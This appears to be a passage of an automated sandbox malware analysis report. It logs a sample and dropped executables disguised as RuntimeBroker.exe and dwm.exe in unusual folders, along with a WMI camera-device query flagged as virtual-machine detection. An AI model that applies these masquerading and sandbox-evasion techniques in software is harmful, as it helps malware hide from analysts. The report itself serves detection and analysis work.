                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
